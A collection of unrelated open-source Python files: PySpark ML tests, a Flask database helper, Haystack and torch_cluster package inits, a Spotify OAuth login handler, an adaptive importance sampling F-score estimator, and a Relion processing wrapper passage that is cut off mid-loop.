data_path = "data/mllib/sample_multiclass_classification_data.txt"
df = self.spark.read.format("libsvm").load(data_path)
lor = LogisticRegression(regParam=0.01,
lowerBoundsOnCoefficients=Matrices.dense(3, 4, range(12)),
upperBoundsOnIntercepts=Vectors.dense(0.0, 0.0, 0.0))
model = lor.fit(df)
expected = [[4.593, 4.5516, 9.0099, 12.2904],
[1.0, 8.1093, 7.0, 10.0],
[3.041, 5.0, 8.0, 11.0]]
for i in range(0, len(expected)):
self.assertTrue(
np.allclose(model.coefficientMatrix.toArray()[i], expected[i], atol=1E-4))
self.assertTrue(
np.allclose(model.interceptVector.toArray(), [-0.9057, -1.1392, -0.0033], atol=1E-4))
class MultilayerPerceptronClassifierTest(SparkSessionTestCase):
def test_raw_and_probability_prediction(self):
data_path = "data/mllib/sample_multiclass_classification_data.txt"
df = self.spark.read.format("libsvm").load(data_path)
mlp = MultilayerPerceptronClassifier(maxIter=100, layers=[4, 5, 4, 3],
blockSize=128, seed=123)
model = mlp.fit(df)
test = self.sc.parallelize([Row(features=Vectors.dense(0.1, 0.1, 0.25, 0.25))]).toDF()
result = model.transform(test).head()
expected_prediction = 2.0
expected_probability = [0.0, 0.0, 1.0]
expected_rawPrediction = [57.3955, -124.5462, 67.9943]
self.assertTrue(result.prediction, expected_prediction)
self.assertTrue(np.allclose(result.probability, expected_probability, atol=1E-4))
self.assertTrue(np.allclose(result.rawPrediction, expected_rawPrediction, atol=1E-4))
class OneVsRestTests(SparkSessionTestCase):
def test_copy(self):
df = self.spark.createDataFrame([(0.0, Vectors.dense(1.0, 0.8)),
(1.0, Vectors.sparse(2, [], [])),
(2.0, Vectors.dense(0.5, 0.5))],
["label", "features"])
lr = LogisticRegression(maxIter=5, regParam=0.01)
ovr = OneVsRest(classifier=lr)
ovr1 = ovr.copy({lr.maxIter: 10})
self.assertEqual(ovr.getClassifier().getMaxIter(), 5)
self.assertEqual(ovr1.getClassifier().getMaxIter(), 10)
model = ovr.fit(df)
model1 = model.copy({model.predictionCol: "indexed"})
self.assertEqual(model1.getPredictionCol(), "indexed")
def test_output_columns(self):
df = self.spark.createDataFrame([(0.0, Vectors.dense(1.0, 0.8)),
(1.0, Vectors.sparse(2, [], [])),
(2.0, Vectors.dense(0.5, 0.5))],
["label", "features"])
lr = LogisticRegression(maxIter=5, regParam=0.01)
ovr = OneVsRest(classifier=lr, parallelism=1)
model = ovr.fit(df)
output = model.transform(df)
self.assertEqual(output.columns, ["label", "features", "prediction"])
def test_parallelism_doesnt_change_output(self):
df = self.spark.createDataFrame([(0.0, Vectors.dense(1.0, 0.8)),
(1.0, Vectors.sparse(2, [], [])),
(2.0, Vectors.dense(0.5, 0.5))],
["label", "features"])
ovrPar1 = OneVsRest(classifier=LogisticRegression(maxIter=5, regParam=.01), parallelism=1)
modelPar1 = ovrPar1.fit(df)
ovrPar2 = OneVsRest(classifier=LogisticRegression(maxIter=5, regParam=.01), parallelism=2)
modelPar2 = ovrPar2.fit(df)
for i, model in enumerate(modelPar1.models):
self.assertTrue(np.allclose(model.coefficients.toArray(),
modelPar2.models[i].coefficients.toArray(), atol=1E-4))
self.assertTrue(np.allclose(model.intercept, modelPar2.models[i].intercept, atol=1E-4))
def test_support_for_weightCol(self):
df = self.spark.createDataFrame([(0.0, Vectors.dense(1.0, 0.8), 1.0),
(1.0, Vectors.sparse(2, [], []), 1.0),
(2.0, Vectors.dense(0.5, 0.5), 1.0)],
["label", "features", "weight"])
# classifier inherits hasWeightCol
lr = LogisticRegression(maxIter=5, regParam=0.01)
ovr = OneVsRest(classifier=lr, weightCol="weight")
self.assertIsNotNone(ovr.fit(df))
# classifier doesn't inherit hasWeightCol
dt = DecisionTreeClassifier()
ovr2 = OneVsRest(classifier=dt, weightCol="weight")
self.assertIsNotNone(ovr2.fit(df))
class KMeansTests(SparkSessionTestCase):
def test_kmeans_cosine_distance(self):
data = [(Vectors.dense([1.0, 1.0]),), (Vectors.dense([10.0, 10.0]),),
(Vectors.dense([1.0, 0.5]),), (Vectors.dense([10.0, 4.4]),),
(Vectors.dense([-1.0, 1.0]),), (Vectors.dense([-100.0, 90.0]),)]
df = self.spark.createDataFrame(data, ["features"])
kmeans = KMeans(k=3, seed=1, distanceMeasure="cosine")
model = kmeans.fit(df)
result = model.transform(df).collect()
self.assertTrue(result[0].prediction == result[1].prediction)
self.assertTrue(result[2].prediction == result[3].prediction)
self.assertTrue(result[4].prediction == result[5].prediction)
class LDATest(SparkSessionTestCase):
def _compare(self, m1, m2):
"""
Temp method for comparing instances.
TODO: Replace with generic implementation once SPARK-14706 is merged.
"""
self.assertEqual(m1.uid, m2.uid)
self.assertEqual(type(m1), type(m2))
self.assertEqual(len(m1.params), len(m2.params))
for p in m1.params:
if m1.isDefined(p):
self.assertEqual(m1.getOrDefault(p), m2.getOrDefault(p))
self.assertEqual(p.parent, m2.getParam(p.name).parent)
if isinstance(m1, LDAModel):
self.assertEqual(m1.vocabSize(), m2.vocabSize())
self.assertEqual(m1.topicsMatrix(), m2.topicsMatrix())
def test_persistence(self):
# Test save/load for LDA, LocalLDAModel, DistributedLDAModel.
df = self.spark.createDataFrame([
[1, Vectors.dense([0.0, 1.0])],
[2, Vectors.sparse(2, {0: 1.0})],
], ["id", "features"])
# Fit model
lda = LDA(k=2, seed=1, optimizer="em")
distributedModel = lda.fit(df)
self.assertTrue(distributedModel.isDistributed())
localModel = distributedModel.toLocal()
self.assertFalse(localModel.isDistributed())
# Define paths
path = tempfile.mkdtemp()
lda_path = path + "/lda"
dist_model_path = path + "/distLDAModel"
local_model_path = path + "/localLDAModel"
# Test LDA
lda.save(lda_path)
lda2 = LDA.load(lda_path)
self._compare(lda, lda2)
# Test DistributedLDAModel
distributedModel.save(dist_model_path)
distributedModel2 = DistributedLDAModel.load(dist_model_path)
self._compare(distributedModel, distributedModel2)
# Test LocalLDAModel
localModel.save(local_model_path)
localModel2 = LocalLDAModel.load(local_model_path)
self._compare(localModel, localModel2)
# Clean up
try:
rmtree(path)
except OSError:
pass
class FPGrowthTests(SparkSessionTestCase):
def setUp(self):
super(FPGrowthTests, self).setUp()
self.data = self.spark.createDataFrame(
[([1, 2], ), ([1, 2], ), ([1, 2, 3], ), ([1, 3], )],
["items"])
def test_association_rules(self):
fp = FPGrowth()
fpm = fp.fit(self.data)
expected_association_rules = self.spark.createDataFrame(
[([3], [1], 1.0, 1.0), ([2], [1], 1.0, 1.0)],
["antecedent", "consequent", "confidence", "lift"]
)
actual_association_rules = fpm.associationRules
self.assertEqual(actual_association_rules.subtract(expected_association_rules).count(), 0)
self.assertEqual(expected_association_rules.subtract(actual_association_rules).count(), 0)
def test_freq_itemsets(self):
fp = FPGrowth()
fpm = fp.fit(self.data)
expected_freq_itemsets = self.spark.createDataFrame(
[([1], 4), ([2], 3), ([2, 1], 3), ([3], 2), ([3, 1], 2)],
["items", "freq"]
)
actual_freq_itemsets = fpm.freqItemsets
self.assertEqual(actual_freq_itemsets.subtract(expected_freq_itemsets).count(), 0)
self.assertEqual(expected_freq_itemsets.subtract(actual_freq_itemsets).count(), 0)
def tearDown(self):
del self.data
class ALSTest(SparkSessionTestCase):
def test_storage_levels(self):
df = self.spark.createDataFrame(
[(0, 0, 4.0), (0, 1, 2.0), (1, 1, 3.0), (1, 2, 4.0), (2, 1, 1.0), (2, 2, 5.0)],
["user", "item", "rating"])
als = ALS().setMaxIter(1).setRank(1)
# test default params
als.fit(df)
self.assertEqual(als.getIntermediateStorageLevel(), "MEMORY_AND_DISK")
self.assertEqual(als._java_obj.getIntermediateStorageLevel(), "MEMORY_AND_DISK")
self.assertEqual(als.getFinalStorageLevel(), "MEMORY_AND_DISK")
self.assertEqual(als._java_obj.getFinalStorageLevel(), "MEMORY_AND_DISK")
# test non-default params
als.setIntermediateStorageLevel("MEMORY_ONLY_2")
als.setFinalStorageLevel("DISK_ONLY")
als.fit(df)
self.assertEqual(als.getIntermediateStorageLevel(), "MEMORY_ONLY_2")
self.assertEqual(als._java_obj.getIntermediateStorageLevel(), "MEMORY_ONLY_2")
self.assertEqual(als.getFinalStorageLevel(), "DISK_ONLY")
self.assertEqual(als._java_obj.getFinalStorageLevel(), "DISK_ONLY")
class GeneralizedLinearRegressionTest(SparkSessionTestCase):
def test_tweedie_distribution(self):
df = self.spark.createDataFrame(
[(1.0, Vectors.dense(0.0, 0.0)),
(1.0, Vectors.dense(1.0, 2.0)),
(2.0, Vectors.dense(0.0, 0.0)),
(2.0, Vectors.dense(1.0, 1.0)), ], ["label", "features"])
glr = GeneralizedLinearRegression(family="tweedie", variancePower=1.6)
model = glr.fit(df)
self.assertTrue(np.allclose(model.coefficients.toArray(), [-0.4645, 0.3402], atol=1E-4))
self.assertTrue(np.isclose(model.intercept, 0.7841, atol=1E-4))
model2 = glr.setLinkPower(-1.0).fit(df)
self.assertTrue(np.allclose(model2.coefficients.toArray(), [-0.6667, 0.5], atol=1E-4))
self.assertTrue(np.isclose(model2.intercept, 0.6667, atol=1E-4))
def test_offset(self):
df = self.spark.createDataFrame(
[(0.2, 1.0, 2.0, Vectors.dense(0.0, 5.0)),
(0.5, 2.1, 0.5, Vectors.dense(1.0, 2.0)),
(0.9, 0.4, 1.0, Vectors.dense(2.0, 1.0)),
(0.7, 0.7, 0.0, Vectors.dense(3.0, 3.0))], ["label", "weight", "offset", "features"])
glr = GeneralizedLinearRegression(family="poisson", weightCol="weight", offsetCol="offset")
model = glr.fit(df)
self.assertTrue(np.allclose(model.coefficients.toArray(), [0.664647, -0.3192581],
atol=1E-4))
self.assertTrue(np.isclose(model.intercept, -1.561613, atol=1E-4))
class LinearRegressionTest(SparkSessionTestCase):
def test_linear_regression_with_huber_loss(self):
data_path = "data/mllib/sample_linear_regression_data.txt"
df = self.spark.read.format("libsvm").load(data_path)
lir = LinearRegression(loss="huber", epsilon=2.0)
model = lir.fit(df)
expectedCoefficients = [0.136, 0.7648, -0.7761, 2.4236, 0.537,
1.2612, -0.333, -0.5694, -0.6311, 0.6053]
expectedIntercept = 0.1607
expectedScale = 9.758
self.assertTrue(
np.allclose(model.coefficients.toArray(), expectedCoefficients, atol=1E-3))
self.assertTrue(np.isclose(model.intercept, expectedIntercept, atol=1E-3))
self.assertTrue(np.isclose(model.scale, expectedScale, atol=1E-3))
if __name__ == "__main__":
from pyspark.ml.tests.test_algorithms import *
try:
import xmlrunner
testRunner = xmlrunner.XMLTestRunner(output='target/test-reports')
except ImportError:
testRunner = None
unittest.main(testRunner=testRunner, verbosity=2)
|
the-stack_0_25185
|
import sqlite3
import click
from flask import current_app, g
from flask.cli import with_appcontext
def get_db():
if 'db' not in g:
g.db = sqlite3.connect(
current_app.config['DATABASE'],
detect_types=sqlite3.PARSE_DECLTYPES
)
g.db.row_factory = sqlite3.Row
return g.db
def close_db(e=None):
db = g.pop('db', None)
if db is not None:
db.close()
def init_db():
db = get_db()
with current_app.open_resource('schema.sql') as f:
db.executescript(f.read().decode('utf8'))
@click.command('init-db')
@with_appcontext
def init_db_command():
"""Clear the existing data and create new tables."""
init_db()
click.echo('Initialized the database.')
def init_app(app):
app.teardown_appcontext(close_db)
app.cli.add_command(init_db_command)
|
the-stack_0_25186
|
import logging
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from haystack.constants import DEFAULT_ALIAS
from haystack import signals
from haystack.utils import loading
__author__ = 'Daniel Lindsley'
__version__ = (2, 0, 1, 'dev')
# Setup default logging.
log = logging.getLogger('haystack')
stream = logging.StreamHandler()
stream.setLevel(logging.INFO)
log.addHandler(stream)
# Help people clean up from 1.X.
if hasattr(settings, 'HAYSTACK_SITECONF'):
raise ImproperlyConfigured('The HAYSTACK_SITECONF setting is no longer used & can be removed.')
if hasattr(settings, 'HAYSTACK_SEARCH_ENGINE'):
raise ImproperlyConfigured('The HAYSTACK_SEARCH_ENGINE setting has been replaced with HAYSTACK_CONNECTIONS.')
if hasattr(settings, 'HAYSTACK_ENABLE_REGISTRATIONS'):
raise ImproperlyConfigured('The HAYSTACK_ENABLE_REGISTRATIONS setting is no longer used & can be removed.')
if hasattr(settings, 'HAYSTACK_INCLUDE_SPELLING'):
raise ImproperlyConfigured('The HAYSTACK_INCLUDE_SPELLING setting is now a per-backend setting & belongs in HAYSTACK_CONNECTIONS.')
# Check the 2.X+ bits.
if not hasattr(settings, 'HAYSTACK_CONNECTIONS'):
raise ImproperlyConfigured('The HAYSTACK_CONNECTIONS setting is required.')
if DEFAULT_ALIAS not in settings.HAYSTACK_CONNECTIONS:
raise ImproperlyConfigured("The default alias '%s' must be included in the HAYSTACK_CONNECTIONS setting." % DEFAULT_ALIAS)
# Load the connections.
connections = loading.ConnectionHandler(settings.HAYSTACK_CONNECTIONS)
# Load the router(s).
connection_router = loading.ConnectionRouter()
if hasattr(settings, 'HAYSTACK_ROUTERS'):
if not isinstance(settings.HAYSTACK_ROUTERS, (list, tuple)):
raise ImproperlyConfigured("The HAYSTACK_ROUTERS setting must be either a list or tuple.")
connection_router = loading.ConnectionRouter(settings.HAYSTACK_ROUTERS)
# Setup the signal processor.
signal_processor_path = getattr(settings, 'HAYSTACK_SIGNAL_PROCESSOR', 'haystack.signals.BaseSignalProcessor')
signal_processor_class = loading.import_class(signal_processor_path)
signal_processor = signal_processor_class(connections, connection_router)
# Per-request, reset the ghetto query log.
# Probably not extraordinarily thread-safe but should only matter when
# DEBUG = True.
def reset_search_queries(**kwargs):
for conn in connections.all():
conn.reset_queries()
if settings.DEBUG:
from django.core import signals as django_signals
django_signals.request_started.connect(reset_search_queries)
|
the-stack_0_25187
|
import importlib
import os.path as osp
import torch
__version__ = '1.5.5'
for library in [
'_version', '_grid', '_graclus', '_fps', '_rw', '_sampler', '_nearest',
'_knn', '_radius'
]:
torch.ops.load_library(importlib.machinery.PathFinder().find_spec(
library, [osp.dirname(__file__)]).origin)
if torch.version.cuda is not None: # pragma: no cover
cuda_version = torch.ops.torch_cluster.cuda_version()
if cuda_version == -1:
major = minor = 0
elif cuda_version < 10000:
major, minor = int(str(cuda_version)[0]), int(str(cuda_version)[2])
else:
major, minor = int(str(cuda_version)[0:2]), int(str(cuda_version)[3])
t_major, t_minor = [int(x) for x in torch.version.cuda.split('.')]
if t_major != major or t_minor != minor:
raise RuntimeError(
f'Detected that PyTorch and torch_cluster were compiled with '
f'different CUDA versions. PyTorch has CUDA version '
f'{t_major}.{t_minor} and torch_cluster has CUDA version '
f'{major}.{minor}. Please reinstall the torch_cluster that '
f'matches your PyTorch install.')
from .graclus import graclus_cluster # noqa
from .grid import grid_cluster # noqa
from .fps import fps # noqa
from .nearest import nearest # noqa
from .knn import knn, knn_graph # noqa
from .radius import radius, radius_graph # noqa
from .rw import random_walk # noqa
from .sampler import neighbor_sampler # noqa
__all__ = [
'graclus_cluster',
'grid_cluster',
'fps',
'nearest',
'knn',
'knn_graph',
'radius',
'radius_graph',
'random_walk',
'neighbor_sampler',
'__version__',
]
|
the-stack_0_25188
|
# Future
from __future__ import annotations
# Standard Library
import secrets
# Packages
import aiohttp.web
import aiohttp_session
import aiospotify
# My stuff
from core import config
from core.app import Dashboard
async def spotify_login(request: aiohttp.web.Request) -> aiohttp.web.Response:
session = await aiohttp_session.get_session(request)
state = secrets.token_urlsafe(20)
session["spotify_state"] = state
return aiohttp.web.HTTPFound(
f"https://accounts.spotify.com/authorize/?"
f"client_id={config.SPOTIFY_CLIENT_ID}&"
f"response_type=code&"
f"redirect_uri={config.SPOTIFY_LOGIN_REDIRECT}&"
f"state={state}&"
f"scope=playlist-read-private%20playlist-read-collaborative%20user-read-private%20user-read-playback-state%20user-read-currently-playing%20"
f"user-library-read%20user-read-playback-position%20user-read-recently-played%20user-top-read%20&"
f"show_dialog=True"
)
async def spotify_login_callback(request: aiohttp.web.Request) -> aiohttp.web.Response:
if error := request.query.get("error"):
return aiohttp.web.Response(text=f"you cancelled the login prompt: {error}", status=400)
session = await aiohttp_session.get_session(request)
if session.get("spotify_state") != request.query.get("state"):
return aiohttp.web.Response(text="'state' query parameters do not match.", status=400)
app: Dashboard = request.app # type: ignore
if not (user := await app.get_user(session)):
return aiohttp.web.Response(text="you are not logged in with discord.", status=400)
async with app.session.post(
url="https://accounts.spotify.com/api/token",
data={
"client_id": config.SPOTIFY_CLIENT_ID,
"client_secret": config.SPOTIFY_CLIENT_SECRET,
"grant_type": "authorization_code",
"code": request.query["code"],
"redirect_uri": config.SPOTIFY_LOGIN_REDIRECT,
},
headers={
"Content-Type": "application/x-www-form-urlencoded"
}
) as response:
if response.status != 200:
return aiohttp.web.Response(text="something went wrong while requesting spotify access token.", status=400)
data = await response.json()
await app.db.execute("UPDATE users SET spotify_refresh_token = $1 WHERE id = $2", data["refresh_token"], user.id)
app.spotify_user_credentials[user.id] = aiospotify.UserCredentials(data, config.SPOTIFY_CLIENT_ID, config.SPOTIFY_CLIENT_SECRET)
return aiohttp.web.HTTPFound("/profile")
def setup(app: aiohttp.web.Application) -> None:
app.add_routes(
[
aiohttp.web.get(r"/api/spotify/login", spotify_login),
aiohttp.web.get(r"/api/spotify/login/callback", spotify_login_callback)
]
)
|
the-stack_0_25189
|
import math
import numpy as np
from sklearn.isotonic import IsotonicRegression
# Alternative to tree: isotonic regression
def fit_isotonic(y_test, prob_pos):
"""Given 0/1 labels 'y_test' and predicted model scores 'prob_pos', Train
an isotonic regression model to calibrate model scores."""
try:
iso_reg = IsotonicRegression(out_of_bounds="clip").fit(prob_pos, y_test)
except RuntimeError:
iso_reg = None
return iso_reg
def sample_iso(
y_pred,
prob_pos,
iso_reg,
samples,
g,
alpha,
d_set,
):
"""
Weighted sampling of rows to label
Args:
y_pred: predicted labels (k,)
prob_pos: model scores (k,)
iso_reg: isotonic regression model (or None)
samples: number of datapoints to sample (int)
g: current best-prediction of the F-Score (float in [0,1])
alpha: defines the F_{\alpha} score estimated (float in [0,1])
alpha = 0 -> recall
alpha = 1 -> precision
alpha = 0.5 -> F1
d_set: indicators of whether each datapoint has already been labeled (k,)
set this to np.zeros((k)) if no datapoints have been labeled
Returns:
sampled rows (samples,)
weights of sample d rows (samples,)
"""
num_rows = len(y_pred)
# Deterministically sample the rows that have already been labeled
# (since they require no additional budget)
d_rows = np.where(d_set)[0]
d_weights = np.ones(len(d_rows))
if len(d_rows) > samples:
return d_rows, d_weights
samples -= len(d_rows)
# Sample randomly if there's no isotonic regression model available for calibration
# Otherwise, use the calibration model to compute calibrated probabilities 'p_1'
if iso_reg is None:
rand_rows = np.random.choice(num_rows, size=samples, replace=True)
return np.concatenate([rand_rows, d_rows]), np.concatenate(
[np.full((samples), 1.0 / num_rows), d_weights]
)
else:
p_1 = iso_reg.predict(prob_pos) * 0.98 + 0.01 # Just to smooth 0 and 1
# Compute Sawade et al.'s sampling weights from the calibrated probabilities 'p_1'
weight_1 = np.sqrt(p_1 * ((1.0 - g) ** 2) + ((alpha * g) ** 2) * (1.0 - p_1))
weight_0 = (1 - alpha) * np.sqrt(p_1 * (g ** 2))
weights = weight_1 * y_pred + weight_0 * (1 - y_pred)
# Sample according to 'weights' and return the rows sampled along with their
# associated weights
weight_sum = np.sum(weights)
if weight_sum > 0:
weights = weights[d_set is not True].squeeze()
weights /= np.sum(weights)
options = np.arange(num_rows)
options = options[d_set is not True].squeeze()
rand_row_indices = np.random.choice(
len(options), size=samples, p=weights, replace=True
)
rand_rows = options[rand_row_indices]
return np.concatenate([rand_rows, d_rows]), np.concatenate(
[1.0 / (weights[rand_row_indices] * samples), d_weights]
)
else:
# If all weights are zero, sample randomly
rand_rows = np.random.choice(num_rows, size=samples, replace=True)
return np.concatenate([rand_rows, d_rows]), np.concatenate(
[np.full(samples, 1.0 / num_rows), d_weights]
)
def get_fscore(y_pred, y_test, rows, weights):
"""
Compute F-Score from sampled rows and weights
Args:
y_pred: model predictions (k,)
y_test: ground-truth labels (k,)
rows: sampled rows (samples,)
weights: sampled weights (samples,)
Returns:
score: estimated F-Score
trialstd: estimated standard deviation of F-Score estimate
den:
"""
unique_rows = np.unique(rows)
unique_weights = np.array([weights[rows == elem].sum() for elem in unique_rows])
rows = unique_rows
weights = unique_weights
# Compute F-Score
num = ((y_test[rows] == y_pred[rows]) * weights).sum()
den = weights.sum()
score = num / den
# Compute standard deviation of estimate
var = ((((y_test[rows] == y_pred[rows]) - score) ** 2) * (weights ** 2)).mean() / (
(weights.mean() ** 2) * (1.0 - ((weights ** 2).sum() / (weights.sum() ** 2)))
)
n = len(rows)
trialstd = np.sqrt(var) / np.sqrt(n)
return score, trialstd, den
def ais_singleiter(
y_pred, y_test, prob_pos, sample_budget, g, alpha, known_rows, filter_rows
):
"""
Perform a single AIS iteration of calibration + sampling
Args:
y_pred: model predictions (k,)
y_test: ground-truth labels for sampled rows (samples,)
prob_pos: model scores (k,)
sample_budget: labeling budget for the iteration (int)
g: current best-prediction of the F-Score (float in [0,1])
alpha: defines the F_{\alpha} score estimated (float in [0,1])
alpha = 0 -> recall
alpha = 1 -> precision
alpha = 0.5 -> F1
known_rows: sampled rows (samples,)
filtered_rows: indicator array allowing us to restrict sampling to a
subset of rows (k,)
Returns:
score: estimated F-Score
trialstd: estimated standard deviation of F-Score estimate
den:
"""
if np.sum(known_rows) > 0:
iso_reg = fit_isotonic(y_test, prob_pos[known_rows])
else:
iso_reg = None
rand_rows, weights = sample_iso(
y_pred[filter_rows],
prob_pos[filter_rows],
iso_reg,
sample_budget,
g,
alpha,
known_rows[filter_rows],
)
return rand_rows, weights
def ais_fullalgorithm(y_pred, y_test, prob_pos, sample_budget):
"""
Combine iterative AIS sampling with F-Score computation to compute best
estimate of F-Score
Args:
y_pred: model predictions (k,)
y_test: ground-truth labels (used as oracle) (k,)
prob_pos: model scores (k,)
sample_budget: total labeling budget (int)
Returns:
prf1: estimates of (precision, recall, F1)
stds: estimates of standard deviation of estimated (precision, recall, F1)
budget: actual labeling budget used (int)
"""
# Initialize relevant variables
k_keep = 4
measurements = []
stds = []
measurement_weights = []
all_rand_rows = []
avg_budget = 0
g = 0.5
alpha = 0.5
starting_budget = 10
iteration_count = np.floor(np.log2(sample_budget / starting_budget)).astype(int) + 1
# Sampling loop to iteratively sample batches of points to label
for i in range(iteration_count):
# Restrict sampling domain in early iterations when there aren't many
# labeled positives
# This significantly improves performance on rare categories
poses = y_pred.sum()
if (3 * (i + 1)) * poses < len(y_pred):
filter_rows = np.argpartition(prob_pos, -((3 * (i + 1)) * poses))[
-((3 * (i + 1)) * poses) :
]
else:
filter_rows = np.arange(len(y_pred))
# Enumerate the already-sampled rows
if len(all_rand_rows) > 0:
unique_rows = np.unique(np.concatenate(all_rand_rows))
known_rows = np.zeros(len(y_pred), dtype=bool)
known_rows[unique_rows] = True
else:
known_rows = np.zeros(len(y_pred), dtype=bool)
# Double sampling budget every iteration
if i == (iteration_count - 1):
iter_budget = sample_budget
else:
iter_budget = starting_budget * (2 ** i)
# Use AIS algorithm to sample rows to label
rand_rows, weights = ais_singleiter(
y_pred=y_pred,
y_test=y_test[known_rows],
prob_pos=prob_pos,
sample_budget=iter_budget,
g=g,
alpha=alpha,
known_rows=known_rows,
filter_rows=filter_rows,
)
all_rand_rows.append(filter_rows[rand_rows])
rand_rows = filter_rows[rand_rows]
weights *= len(rand_rows) / len(y_pred)
# Compute precision, recall, and F1 using sampled rows and weights
# Also computes the standard deviation of the estimates
prec, prec_trialstd, prec_den = get_fscore(
y_pred,
y_test,
rand_rows,
weights * y_pred[rand_rows],
)
rec, rec_trialstd, rec_den = get_fscore(
y_pred,
y_test,
rand_rows,
weights * y_test[rand_rows],
)
f1, f1_trialstd, f1_den = get_fscore(
y_pred,
y_test,
rand_rows,
weights * (0.5 * y_pred[rand_rows] + 0.5 * y_test[rand_rows]),
)
measurements.append([prec, rec, f1])
stds.append([prec_trialstd, rec_trialstd, f1_trialstd])
# Update current best estimate of F1
if not math.isnan(f1):
g = 0.5 * g + 0.5 * f1
measurement_weights.append([prec_den, rec_den, f1_den])
all_rand_rows = np.unique(np.concatenate(all_rand_rows))
measurements = np.asarray(measurements)
stds = np.asarray(stds)
measurement_weights = np.array(measurement_weights) + 0.0001
# Keep only the results from the last 'k_keep' iterations of the algorithm
if k_keep > 0: # Set to -1 to deactivate
measurements = measurements[-k_keep:]
stds = stds[-k_keep:]
measurement_weights = measurement_weights[-k_keep:]
# Compute a weighted average of the estimates of F-Score computed across the
# last 'k_keep' iterations
avg_measurements = np.zeros(3)
avg_stds = np.zeros(3)
for k in range(3):
indices = ~np.isnan(measurements[:, k])
if indices.sum() > 0:
normalized_weights = measurement_weights[:, k][indices]
normalized_weights /= np.sum(normalized_weights)
avg_measurements[k] = np.average(
measurements[:, k][indices], weights=measurement_weights[:, k][indices]
)
avg_stds[k] = np.sqrt(
np.sum((stds[:, k][indices] * normalized_weights) ** 2)
)
else:
avg_measurements[k] = math.nan
avg_stds[k] = math.nan
avg_budget = len(all_rand_rows)
return np.array(avg_measurements), np.array(avg_stds), np.array(avg_budget)
|
the-stack_0_25190
|
import datetime
import enum
import functools
import logging
import os
import pathlib
import threading
import time
from pprint import pprint
from typing import Union
import zocalo.util.symlink
import zocalo.wrapper
import relion
from relion.cryolo_relion_it import cryolo_relion_it, dls_options, icebreaker_histogram
from relion.cryolo_relion_it.cryolo_relion_it import RelionItOptions
from relion.dbmodel.modeltables import (
CryoemInitialModelTable,
CTFTable,
MotionCorrectionTable,
ParticleClassificationGroupTable,
ParticleClassificationTable,
ParticlePickerTable,
RelativeIceThicknessTable,
)
logger = logging.getLogger("relion.zocalo.wrapper")
RelionStatus = enum.Enum("RelionStatus", "RUNNING SUCCESS FAILURE")
# to test:
# - create an empty directory
# - run following command to generate a recipe-wrapper:
# dlstbx.find_in_ispyb -p 6844019 -f /dls_sw/apps/zocalo/live/recipes/ispyb-relion.json --recipe-pointer=2 --out=rw && replace "/dls/m12/data/2021/cm28212-1/processed" "$(pwd)/processed" "/dls/m12/data/2021/cm28212-1/tmp" "$(pwd)/tmp" '"$ispyb_autoprocprogram_id"' "83862530" < rw > rw-local
# - run the wrapper:
# dlstbx.wrap --recipewrapper=rw-local --wrap=relion --offline -v
class RelionWrapper(zocalo.wrapper.BaseWrapper):
def run(self):
# Enable log messages for relion.*
logging.getLogger("relion").setLevel(logging.INFO)
# Report python-relion package version
self.status_thread.set_static_status_field("python-relion", relion.__version__)
assert hasattr(self, "recwrap"), "No recipewrapper object found"
self.params = self.recwrap.recipe_step["job_parameters"]
self.working_directory = pathlib.Path(self.params["working_directory"])
self.results_directory = pathlib.Path(self.params["results_directory"])
# Here we cheat. Ultimately we want to run the processing inside the
# 'working' directory, and then copy relevant output into the 'results'
# directory as we go along. In the first instance we will just run Relion
# inside the 'results' directory, and ignore the 'working' directory
# completely.
self.working_directory = self.results_directory
# Create working and results directory
self.working_directory.mkdir(parents=True, exist_ok=True)
self.results_directory.mkdir(parents=True, exist_ok=True)
if self.params.get("create_symlink"):
# Create symbolic link above directories
# We want users to go to the most recent execution, as they can stop
# and restart processing from SynchWeb. Thus we overwrite symlinks.
zocalo.util.symlink.create_parent_symlink(
self.working_directory,
self.params["create_symlink"],
overwrite_symlink=True,
)
zocalo.util.symlink.create_parent_symlink(
self.results_directory,
self.params["create_symlink"],
overwrite_symlink=True,
)
# Relion needs to have a 'Movies' link inside the working directory
# pointing to the image files
movielink = "Movies"
os.symlink(self.params["image_directory"], self.working_directory / movielink)
self.params["ispyb_parameters"]["import_images"] = os.path.join(
movielink,
pathlib.Path(self.params["ispyb_parameters"]["import_images"]).relative_to(
self.params["image_directory"]
),
)
# Debug output
pprint(self.params)
# Select specific Cryolo version if so desired
if self.params.get("cryolo_version"):
os.environ["CRYOLO_VERSION"] = self.params["cryolo_version"]
logger.info("Selected cryolo version %s", self.params["cryolo_version"])
# Initialise number of imported files to 0
imported_files = []
mc_job_time_all_processed = None
for k, v in self.params["ispyb_parameters"].items():
if v.isnumeric():
self.params["ispyb_parameters"][k] = int(v)
elif v.lower() == "true":
self.params["ispyb_parameters"][k] = True
elif v.lower() == "false":
self.params["ispyb_parameters"][k] = False
else:
try:
self.params["ispyb_parameters"][k] = float(v)
except ValueError:
pass
if self.params["ispyb_parameters"]["import_images"].endswith(".eer"):
self.params["ispyb_parameters"]["motioncor_do_own"] = True
pprint(self.params["ispyb_parameters"])
self.opts = RelionItOptions()
self.opts.update_from(vars(dls_options))
self.opts.update_from(self.params["ispyb_parameters"])
# Start Relion
self._relion_subthread = threading.Thread(
target=self.start_relion, name="relion_subprocess_runner", daemon=True
)
self._relion_subthread.start()
relion_started = time.time()
preprocess_check = self.results_directory / "RUNNING_PIPELINER_PREPROCESS"
all_process_check = self.results_directory / "RUNNING_RELION_IT"
relion_prj = relion.Project(
self.working_directory,
run_options=self.opts,
message_constructors={
"ispyb": construct_message,
"images": images_msgs,
"images_particles": images_particles_msgs,
},
)
while not relion_prj.origin_present() or not preprocess_check.is_file():
time.sleep(0.5)
if time.time() - relion_started > 10 * 60:
break
relion_prj.load()
preproc_recently_run = False
processing_ended = False
should_send_icebreaker = True
icebreaker_particles_star_file_found = False
while (
self._relion_subthread.is_alive() or preprocess_check.is_file()
) and False not in [n.environment["status"] for n in relion_prj if n._out]:
time.sleep(1)
# logger.info("Looking for results")
ispyb_command_list = []
images_command_list = []
images_particles_command_list = []
if pathlib.Path(self.params["stop_file"]).is_file():
relion_prj.load()
for job_path in relion_prj._job_nodes:
(
self.results_directory
/ job_path.name
/ "RELION_JOB_EXIT_ABORTED"
).touch()
for p in self.results_directory.glob("RUNNING_*"):
p.unlink()
relion_prj.load()
# Should only return results that have not previously been sent
# for fr in relion_prj.results.fresh:
# curr_res = ispyb_results(fr.stage_object, fr.job_name, self.opts)
# ispyb_command_list.extend(curr_res)
